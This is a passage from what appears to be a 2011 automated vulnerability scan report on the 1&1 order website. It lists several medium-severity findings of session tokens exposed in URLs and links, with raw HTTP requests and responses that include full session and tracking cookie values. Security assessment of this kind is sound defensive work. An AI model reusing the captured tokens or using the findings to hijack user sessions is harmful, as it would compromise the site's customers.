<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingDriving;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
Directions
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingCgi;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
Ready-to-Run CGI Library
</a>
...[SNIP]...
</span><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureToolsRatepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
RatePoint
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureMarketingCtrGoogleAdWords;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
Google&#8482; AdWords**
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureMarketingCtrCitysearch;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
Citysearch&reg;
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureMarketingCtrSesub;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
Simple Submission
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureMarketingCtrStat;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
1&amp;1 SiteAnalytics
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/popupGreenPower;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">1&amp;1 Downloadable Green Logo </a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingMailinglist;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
Mailing List
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingBlog;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
1&amp;1 Blog
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureCommunicationToolsNewsletter;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
1&amp;1 E-mail Marketing Tool
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingRss;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
Easy RSS
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureCommunicationToolsChat;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
Chat Channels
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureCommunicationToolsDialogue;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
In2site Live Dialogue
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSecurityCertificate;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
GeoTrust Dedicated SSL Certificate
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureGuaranteeMoneyback;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
90-Day Money Back Guarantee
</a>
...[SNIP]...
<br><a class="core_button_normal" href="/xml/order/TcSpecialOffers;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">Click here</a>
...[SNIP]...
<p>** See <a rel="height=350, width=665" class="window-open" href="/xml/order/popupTcGoogleAdwords;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">T&amp;C</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=Hosting&amp;linkOrigin=Hosting&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...

3.74. http://order.1and1.com/xml/order/Instant  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Instant

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/Instant;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:23:01 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Instant?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.domains
Content-Length: 0
Connection: close
Content-Type: text/plain


3.75. http://order.1and1.com/xml/order/International  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/International

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/International;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:38:04 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/International?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.76. http://order.1and1.com/xml/order/Jumpto  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Jumpto

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/Jumpto;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkId=hd.log.eue&site=PU.WH.US&origin.page=Home&linkOrigin=Home&linkId=hd.log.eue HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:22:35 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Jumpto?__frame=_top&__lf=Static&linkId=hd.log.eue&site=PU.WH.US&origin.page=Home&linkOrigin=Home&linkId=hd.log.eue
Content-Length: 0
Connection: close
Content-Type: text/plain


3.77. http://order.1and1.com/xml/order/LocalSubmission  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/LocalSubmission

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/LocalSubmission;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.listlocal HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:34:10 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/LocalSubmission?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.listlocal
Content-Length: 0
Connection: close
Content-Type: text/plain


3.78. http://order.1and1.com/xml/order/Mail  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Mail

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /xml/order/Mail;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__reuse=1300643443260
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Hosting; ucuo=20110320183236-002.TCpfix141a; lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=taV4uMTIoUVFRS3VrcjhwajcpM2xfWTFIOzUdIR4eHRsdMi8vMjErLjIlJyYlIkc1YVZYZh4gG0s7ZXQ6LS4qKS4qKCspIysiISpiYykeJWx1Oy4vKyovLCoqKSclJyo=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:26:AAABLtRlgbZ6_eg4OG2LZboWFQTS2jli:1300643545526; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:52:06 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Sal8vMjMpUlJSTF9sczlxazgqNG1gWjJJPDYeIh8fHhweHDAwMzIsLzMmKCcmI0g2YldZZx8hHEwlZnU7Li8rKi8rKSwqJCwjIitjZCofJlZ2PC8wLCswLSsrKigmKCs=; Expires=Fri, 07-Apr-2079 21:06:13 GMT; Path=/
ETag: d9cfb4af92e44225f0ad2cca48eb1ca6
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 18209


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=Mail&amp;linkOrigin=Mail&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Home;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.home" rel="button-hd-nav-home">Home</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=Mail&amp;page=switch&amp;linkOrigin=Mail&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.server" rel="button-hd-nav-server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<img src="/oneandone_en_common/img/pages/Mail/vi_mail_address.png" alt="Mail" class="pos alphapng" style="margin-left: -40px;" width="299" height="86"><a class="btn btn-yellow-large btn-select" href="/xml/order/MailInstantMail;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static"><span>
...[SNIP]...
</ul><a class="btn btn-blue-large btn-select" href="/xml/order/MicrosoftExchange;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static"><span>
...[SNIP]...
</ul><a class="btn btn-blue-large btn-select" href="/xml/order/MailXchange;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static"><span>
...[SNIP]...
<p>* Offers valid for a limited time only. Setup fee and other terms and conditions may apply.
<a class="core_button_normal" href="/xml/order/TcSpecialOffers;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static">Click here</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=Mail&amp;linkOrigin=Mail&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...

3.79. http://order.1and1.com/xml/order/Mail  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Mail

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/Mail;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__reuse=1300643443260
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Hosting; ucuo=20110320183236-002.TCpfix141a; lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=taV4uMTIoUVFRS3VrcjhwajcpM2xfWTFIOzUdIR4eHRsdMi8vMjErLjIlJyYlIkc1YVZYZh4gG0s7ZXQ6LS4qKS4qKCspIysiISpiYykeJWx1Oy4vKyovLCoqKSclJyo=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:26:AAABLtRlgbZ6_eg4OG2LZboWFQTS2jli:1300643545526; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:52:06 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Sal8vMjMpUlJSTF9sczlxazgqNG1gWjJJPDYeIh8fHhweHDAwMzIsLzMmKCcmI0g2YldZZx8hHEwlZnU7Li8rKi8rKSwqJCwjIitjZCofJlZ2PC8wLCswLSsrKigmKCs=; Expires=Fri, 07-Apr-2079 21:06:13 GMT; Path=/
ETag: d9cfb4af92e44225f0ad2cca48eb1ca6
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 18209


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.80. http://order.1and1.com/xml/order/MailInstantMail  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/MailInstantMail

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/MailInstantMail;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
